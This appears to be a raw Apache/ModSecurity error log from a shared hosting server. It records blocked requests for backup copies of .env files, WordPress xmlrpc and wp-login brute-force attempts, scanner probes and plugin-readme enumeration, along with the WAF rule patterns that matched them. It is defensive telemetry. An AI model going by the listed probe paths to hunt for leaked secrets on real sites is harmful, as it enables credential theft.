[Tue May 26 14:04:05.677502 2026] [security2:error] [pid 578581:tid 578761] [client 208.84.100.197:22258] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "mail.cuatrodoce.com.mx"] [uri "/.env.production.copy"] [unique_id "ahVa_Zm_8al1sb-umPt57gAAADI"]
[Tue May 26 14:04:06.889279 2026] [security2:error] [pid 578581:tid 578796] [client 208.84.100.197:22606] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "mail.cuatrodoce.com.mx"] [uri "/.env.local~"] [unique_id "ahVa_pm_8al1sb-umPt6JAAAAFU"]
[Tue May 26 14:04:06.889285 2026] [security2:error] [pid 578581:tid 578825] [client 208.84.100.197:22670] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "mail.cuatrodoce.com.mx"] [uri "/.env.production.swp"] [unique_id "ahVa_pm_8al1sb-umPt6IwAAAHI"]
[Tue May 26 14:04:06.889341 2026] [security2:error] [pid 578581:tid 578762] [client 208.84.100.197:22556] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "mail.cuatrodoce.com.mx"] [uri "/.env.orig"] [unique_id "ahVa_pm_8al1sb-umPt6FQAAADM"]
[Tue May 26 14:04:06.889451 2026] [security2:error] [pid 578581:tid 578717] [client 208.84.100.197:22508] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "mail.cuatrodoce.com.mx"] [uri "/.env.backup"] [unique_id "ahVa_pm_8al1sb-umPt6EwAAAAY"]
[Tue May 26 14:04:06.889450 2026] [security2:error] [pid 578581:tid 578774] [client 208.84.100.197:22676] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "mail.cuatrodoce.com.mx"] [uri "/.env.production.orig"] [unique_id "ahVa_pm_8al1sb-umPt6HwAAAD8"]
[Tue May 26 14:04:06.889476 2026] [security2:error] [pid 578581:tid 578752] [client 208.84.100.197:22578] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "mail.cuatrodoce.com.mx"] [uri "/.env.local.backup"] [unique_id "ahVa_pm_8al1sb-umPt6EQAAACk"]
[Tue May 26 14:04:06.889511 2026] [security2:error] [pid 578581:tid 578831] [client 208.84.100.197:22648] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "mail.cuatrodoce.com.mx"] [uri "/.env.production.bak"] [unique_id "ahVa_pm_8al1sb-umPt6IQAAAHg"]
[Tue May 26 14:04:06.890144 2026] [security2:error] [pid 578581:tid 578720] [client 208.84.100.197:22500] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "mail.cuatrodoce.com.mx"] [uri "/.env.old"] [unique_id "ahVa_pm_8al1sb-umPt6GQAAAAk"]
[Tue May 26 14:04:06.890168 2026] [security2:error] [pid 578581:tid 578805] [client 208.84.100.197:22664] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "mail.cuatrodoce.com.mx"] [uri "/.env.production~"] [unique_id "ahVa_pm_8al1sb-umPt6IgAAAF4"]
[Tue May 26 14:04:06.890172 2026] [security2:error] [pid 578581:tid 578767] [client 208.84.100.197:22562] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "mail.cuatrodoce.com.mx"] [uri "/.env.copy"] [unique_id "ahVa_pm_8al1sb-umPt6GAAAADg"]
[Tue May 26 14:04:06.890258 2026] [security2:error] [pid 578581:tid 578765] [client 208.84.100.197:22568] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "mail.cuatrodoce.com.mx"] [uri "/.env.local.old"] [unique_id "ahVa_pm_8al1sb-umPt6GgAAADY"]
[Tue May 26 14:04:06.890460 2026] [security2:error] [pid 578581:tid 578799] [client 208.84.100.197:22528] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "mail.cuatrodoce.com.mx"] [uri "/.env~"] [unique_id "ahVa_pm_8al1sb-umPt6FwAAAFg"]
[Tue May 26 14:04:06.890781 2026] [security2:error] [pid 578581:tid 578715] [client 208.84.100.197:22626] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "mail.cuatrodoce.com.mx"] [uri "/.env.local.orig"] [unique_id "ahVa_pm_8al1sb-umPt6JgAAAAQ"]
[Tue May 26 14:04:06.890803 2026] [security2:error] [pid 578581:tid 578806] [client 208.84.100.197:22652] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "mail.cuatrodoce.com.mx"] [uri "/.env.production.old"] [unique_id "ahVa_pm_8al1sb-umPt6IAAAAF8"]
[Tue May 26 14:04:06.890808 2026] [security2:error] [pid 578581:tid 578835] [client 208.84.100.197:22618] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "mail.cuatrodoce.com.mx"] [uri "/.env.local.swp"] [unique_id "ahVa_pm_8al1sb-umPt6JQAAAHw"]
[Tue May 26 14:04:06.891424 2026] [security2:error] [pid 578581:tid 578810] [client 208.84.100.197:22564] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "mail.cuatrodoce.com.mx"] [uri "/.env.local.bak"] [unique_id "ahVa_pm_8al1sb-umPt6GwAAAGM"]
[Tue May 26 14:04:06.892112 2026] [security2:error] [pid 578581:tid 578754] [client 208.84.100.197:22658] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "mail.cuatrodoce.com.mx"] [uri "/.env.production.backup"] [unique_id "ahVa_pm_8al1sb-umPt6HQAAACs"]
[Tue May 26 14:04:06.893551 2026] [security2:error] [pid 578581:tid 578755] [client 208.84.100.197:22640] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "mail.cuatrodoce.com.mx"] [uri "/.env.local.copy"] [unique_id "ahVa_pm_8al1sb-umPt6KAAAACw"]
[Tue May 26 14:04:06.907727 2026] [security2:error] [pid 578581:tid 578736] [client 208.84.100.197:22474] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "mail.cuatrodoce.com.mx"] [uri "/.env.bak"] [unique_id "ahVa_pm_8al1sb-umPt6KQAAABk"]
[Tue May 26 14:04:06.907820 2026] [security2:error] [pid 578581:tid 578746] [client 208.84.100.197:22496] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "mail.cuatrodoce.com.mx"] [uri "/.env.swp"] [unique_id "ahVa_pm_8al1sb-umPt6KgAAACM"]
[Tue May 26 14:04:07.423992 2026] [security2:error] [pid 578581:tid 578749] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVa_5m_8al1sb-umPt6LwAAACY"]
[Tue May 26 14:04:07.477409 2026] [security2:error] [pid 578581:tid 578714] [client 202.141.30.10:35437] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVa_5m_8al1sb-umPt6OwAAAAM"]
[Tue May 26 14:04:07.477533 2026] [security2:error] [pid 578581:tid 578714] [client 202.141.30.10:35437] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVa_5m_8al1sb-umPt6OwAAAAM"]
[Tue May 26 14:04:07.548886 2026] [security2:error] [pid 578581:tid 578737] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVa_5m_8al1sb-umPt6MwAAABo"]
[Tue May 26 14:04:09.351993 2026] [security2:error] [pid 578581:tid 578729] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbAJm_8al1sb-umPt6dwAAABI"]
[Tue May 26 14:04:10.467937 2026] [security2:error] [pid 578581:tid 578825] [client 213.188.94.92:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbAJm_8al1sb-umPt6cgAAAHI"]
[Tue May 26 14:04:11.096969 2026] [security2:error] [pid 578581:tid 578715] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbApm_8al1sb-umPt6rAAAAAQ"]
[Tue May 26 14:04:13.649235 2026] [security2:error] [pid 578581:tid 578757] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbBZm_8al1sb-umPt69gAAAC4"]
[Tue May 26 14:04:15.940202 2026] [security2:error] [pid 578581:tid 578821] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbB5m_8al1sb-umPt7PQAAAG4"]
[Tue May 26 14:04:17.246142 2026] [security2:error] [pid 578581:tid 578765] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbCJm_8al1sb-umPt7WwAAADY"]
[Tue May 26 14:04:18.123765 2026] [ssl:error] [pid 578581:tid 578789] [client 13.219.121.241:22750] AH02032: Hostname md-74.webhostbox.net (default host as no SNI was provided) and hostname mail.consola.co provided via HTTP have no compatible SSL setup for policy 'secure'
[Tue May 26 14:04:18.312129 2026] [security2:error] [pid 578581:tid 578738] [client 202.141.30.10:65426] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVbCpm_8al1sb-umPt7hwAAABs"]
[Tue May 26 14:04:18.312276 2026] [security2:error] [pid 578581:tid 578738] [client 202.141.30.10:65426] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVbCpm_8al1sb-umPt7hwAAABs"]
[Tue May 26 14:04:18.890537 2026] [security2:error] [pid 578581:tid 578774] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbCpm_8al1sb-umPt7kQAAAD8"]
[Tue May 26 14:04:20.677909 2026] [security2:error] [pid 578581:tid 578736] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbDJm_8al1sb-umPt7wQAAABk"]
[Tue May 26 14:04:22.647249 2026] [security2:error] [pid 578581:tid 578795] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbDpm_8al1sb-umPt8CAAAAFQ"]
[Tue May 26 14:04:24.555291 2026] [security2:error] [pid 578581:tid 578720] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbEJm_8al1sb-umPt8PgAAAAk"]
[Tue May 26 14:04:26.189966 2026] [security2:error] [pid 578581:tid 578776] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbEZm_8al1sb-umPt8cAAAAEE"]
[Tue May 26 14:04:26.643127 2026] [proxy:error] [pid 578581:tid 578722] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:04:26.643180 2026] [proxy_http:error] [pid 578581:tid 578722] [client 198.235.24.75:58316] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:04:26.643872 2026] [proxy:error] [pid 578581:tid 578722] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:04:26.643919 2026] [proxy_http:error] [pid 578581:tid 578722] [client 198.235.24.75:58316] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:04:28.100281 2026] [security2:error] [pid 578581:tid 578745] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbE5m_8al1sb-umPt8twAAACI"]
[Tue May 26 14:04:28.444524 2026] [security2:error] [pid 578581:tid 578811] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.kardashevtechnologies.com"] [uri "/index.php"] [unique_id "ahVbFJm_8al1sb-umPt80gAAAGQ"]
[Tue May 26 14:04:29.526688 2026] [security2:error] [pid 578581:tid 578810] [client 202.141.30.10:35440] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVbFZm_8al1sb-umPt88gAAAGM"]
[Tue May 26 14:04:29.526852 2026] [security2:error] [pid 578581:tid 578810] [client 202.141.30.10:35440] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVbFZm_8al1sb-umPt88gAAAGM"]
[Tue May 26 14:04:30.035590 2026] [security2:error] [pid 578581:tid 578743] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbFZm_8al1sb-umPt89QAAACA"]
[Tue May 26 14:04:30.263994 2026] [security2:error] [pid 578581:tid 578604] [remote 209.42.20.53:37360] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.20.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "haddingtonwines.com"] [uri "/wp-login.php"] [unique_id "ahVbFpm_8al1sb-umPt9AgAAVhY"]
[Tue May 26 14:04:31.712404 2026] [security2:error] [pid 578581:tid 578774] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbF5m_8al1sb-umPt9KAAAAD8"]
[Tue May 26 14:04:33.670354 2026] [security2:error] [pid 578581:tid 578737] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbGZm_8al1sb-umPt9XgAAABo"]
[Tue May 26 14:04:34.897964 2026] [security2:error] [pid 578581:tid 578607] [remote 103.95.119.103:46940] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahVbGpm_8al1sb-umPt9kAAAGRk"]
[Tue May 26 14:04:35.310730 2026] [security2:error] [pid 578581:tid 578821] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbGpm_8al1sb-umPt9mAAAAG4"]
[Tue May 26 14:04:36.488920 2026] [security2:error] [pid 578581:tid 578676] [remote 106.63.26.22:0] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "bigpapaairbnbhotel.com"] [uri "/wp-content/plugins/google-site-kit/readme.txt"] [unique_id "ahVbHJm_8al1sb-umPt9xgAAJV4"]
[Tue May 26 14:04:37.093305 2026] [security2:error] [pid 578581:tid 578753] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbHJm_8al1sb-umPt9zAAAACo"]
[Tue May 26 14:04:37.231767 2026] [security2:error] [pid 578581:tid 578624] [remote 57.141.2.3:61734] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 3.2.141.57.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahVbHZm_8al1sb-umPt93AAAXio"]
[Tue May 26 14:04:38.826425 2026] [security2:error] [pid 578581:tid 578738] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbHpm_8al1sb-umPt-AwAAABs"]
[Tue May 26 14:04:40.302549 2026] [security2:error] [pid 578581:tid 578682] [remote 106.63.26.14:0] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "bigpapaairbnbhotel.com"] [uri "/wp-content/plugins/*\\",\\"/readme.txt"] [unique_id "ahVbIJm_8al1sb-umPt-PgAAF2Q"]
[Tue May 26 14:04:40.324437 2026] [security2:error] [pid 578581:tid 578835] [client 202.141.30.10:35571] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVbIJm_8al1sb-umPt-PwAAAHw"]
[Tue May 26 14:04:40.324935 2026] [security2:error] [pid 578581:tid 578835] [client 202.141.30.10:35571] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVbIJm_8al1sb-umPt-PwAAAHw"]
[Tue May 26 14:04:40.918400 2026] [security2:error] [pid 578581:tid 578725] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbIJm_8al1sb-umPt-SQAAAA4"]
[Tue May 26 14:04:42.524035 2026] [security2:error] [pid 578581:tid 578810] [client 106.63.26.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bigpapaairbnbhotel.com"] [uri "/index.php"] [unique_id "ahVbIZm_8al1sb-umPt-cgAAYyc"]
[Tue May 26 14:04:42.787172 2026] [security2:error] [pid 578581:tid 578807] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbIpm_8al1sb-umPt-fwAAAGA"]
